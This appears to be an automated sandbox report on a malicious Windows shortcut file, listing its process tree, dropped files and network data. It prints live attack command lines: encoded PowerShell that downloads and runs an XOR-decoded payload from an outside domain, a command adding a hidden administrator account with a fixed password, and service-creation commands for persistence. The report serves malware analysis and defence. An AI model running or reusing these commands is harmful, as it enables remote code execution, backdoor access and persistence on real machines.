6c Data Ascii: Rxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#b2SmcR4OXV4i[3Wu[V41MjG0eF8uXYSqc35tWIKiX3mt[x4PT1W1e1yw[0Cxc2[q[FWx#((:%wrfpb<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#T2j<#((:%jrspru<ZRxrudl
2024-12-19 13:23:48 UTC	545	IN	Data Raw: 65 44 5b 69 60 56 79 6d 5b 40 3c 3c 23 28 28 3a 0b 25 6c 6b 6d 6b 62 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 58 56 30 7b 60 50 3c 3c 23 28 28 3a 0b 25 77 68 69 66 69 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 58 56 34 69 5b 33 57 75 5b 56 34 31 4d 6a 47 30 65 46 38 75 58 59 53 71 63 33 35 74 50 56 30 7b 60 57 57 31 60 56 79 7b 23 28 28 3a 0b 25 6e 6c 73 60 60 69 71 3c 5a 52 78 72 75 Data Ascii: eD[i`Vym[@<<#((:%lkmkb<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#XV0{`P<<#((:%whifi<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#XV4i[3Wu[V41MjG0eF8uXYSqc35tPV0{`WW1`Vy{#((:%nls``iq<ZRxru
2024-12-19 13:23:48 UTC	782	IN	Data Raw: 6f 66 29 23 52 6a 65 46 65 57 71 58 52 6c 79 68 57 31 6e 7b 58 57 69 42 63 50 3c 3c 23 28 28 3a 0b 48 6f 77 6e 6a 64 2c 44 79 71 73 64 72 72 68 6e 6f 21 29 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 29 25 64 74 6b 76 74 6f 6e 21 2a 21 25 69 62 71 64 6c 66 68 6a 6e 6e 28 28 28 28 3a 0b 21 48 6f 77 6e 6a 64 2c 44 79 71 73 64 72 72 68 6e 6f 21 23 61 25 60 6f 64 73 64 6c 63 76 68 71 67 63 69 77 73 6c 69 69 21 3c 21 61 25 75 73 74 64 23 0b 25 78 6a 63 79 64 78 78 74 63 68 79 78 68 6b 6e 6e 21 3c 21 5a 53 64 67 5c 2f 40 72 72 64 6c 63 6d 78 2f 46 64 75 55 78 71 64 29 29 25 6e 6c 73 Data Ascii: of)#RjeFeWqXRlyhW1n{XWiBcP<<#((:Hownjd,Dyqsdrrhno!)ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof))%dtkvton!*!%ibqdlfhjnn((((:!Hownjd,Dyqsdrrhno!#a%`odsdlcvhqgciwslii!<!a%ustd#%xjcydxxtchyxhknn!<!ZSdg\/@rrdlcmx/FduUxqd))%nls

Target ID:	0
Start time:	08:23:45
Start date:	19/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit
Imagebase:	0x7ff6fde70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	08:23:52
Start date:	19/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x7ff764400000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	08:23:53
Start date:	19/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -NoExit -WindowStyle Hidden -NoProfile -ExecutionPolicy bypass -EncodedCommand SQBFAFgAIAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAoAEkAdwByACAAIgBoAHQAdABwADoALwAvAGEAawBhAGQAZQBtAGkAaQBpAGkAaQBpAGkAaQAuAG8AbgBsAGkAbgBlAC8AdAAvAGYAZgA4ADQANQA5ADQAOABlAGUAMgBjAGMAYgBkAGEAMwAzAGEAYQBhAGYAMQAzAGUAYwA4ADcAMwBhADYAMgAyADIANwBjADYAYwBmADQAMQBkAGMAMwBjAGYAYgA0AGQAZABhADAAMABiADcAMQBlADIAYQBlAGYANgA5ADUAMgBlADIAMwBjADUAOABlADUAYQAyADcAOQA3ADQAYgBiADIAMABlAGMAOAAwADIAMQAyADQAYgBlADkAOQBhACIAKQAuAEMAbwBuAHQAZQBuAHQALgBGAG8AcgBFAGEAYwBoACgAewAkAF8AIAAtAGIAeABvAHIAIAAxAH0AKQApACkA
Imagebase:	0x7ff6fde70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ny.lnk.d.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Detailed information on policy benefits and commission levels for employees after probationary period Storytailors.docx

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0q4pfdj0.hk4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4g4mlgvw.lqi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kui5smt.na0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4vlmsy3.wev.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcxho1c3.doe.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_db51dvu1.2pp.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dxhg2c4e.s4f.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nr4q3cmg.b2i.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qag4oq4r.hmu.psm1

Windows Analysis Report
ny.lnk.d.lnk

Target ID:	11
Start time:	08:23:54
Start date:	19/12/2024
Path:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Detailed information on policy benefits and commission levels for employees after probationary period Storytailors.docx" /o ""
Imagebase:	0x7ff74dce0000
File size:	1'635'104 bytes
MD5 hash:	E7F3B8EA1B06F46176FC5C35307727D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Target ID:	15
Start time:	08:23:55
Start date:	19/12/2024
Path:	C:\Windows\System32\sppsvc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sppsvc.exe
Imagebase:	0x7ff75bec0000
File size:	4'629'328 bytes
MD5 hash:	30C7EF47B57367CC546173BB4BB2BB04
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	18
Start time:	08:24:20
Start date:	19/12/2024
Path:	C:\Windows\Temp\svczHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Temp\svczHost.exe nonbo1 akademiiiiiiii.online 46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36c8f3c85f8f090ed84d188970ebb9376096bba1965529122fe3306bc0716
Imagebase:	0x7ff79c300000
File size:	6'004'224 bytes
MD5 hash:	A2B92A4EB02A185E863F4F17737A0CA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Has exited:	false

Target ID:	24
Start time:	08:24:21
Start date:	19/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Imagebase:	0x7ff764400000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	26
Start time:	08:24:33
Start date:	19/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c sc query myRdpService
Imagebase:	0x7ff6fde70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	29
Start time:	08:24:41
Start date:	19/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto & net start "myRdpService"
Imagebase:	0x7ff6fde70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	32
Start time:	08:24:42
Start date:	19/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe nonbo1" start= auto
Imagebase:	0x7ff6a3eb0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	36
Start time:	08:24:50
Start date:	19/12/2024
Path:	C:\Windows\regedit.exe
Wow64 process (32bit):	false
Commandline:	"regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Imagebase:	0x7ff6d7150000
File size:	370'176 bytes
MD5 hash:	999A30979F6195BF562068639FFC4426
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	40
Start time:	08:24:55
Start date:	19/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Imagebase:	0x7ff764400000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre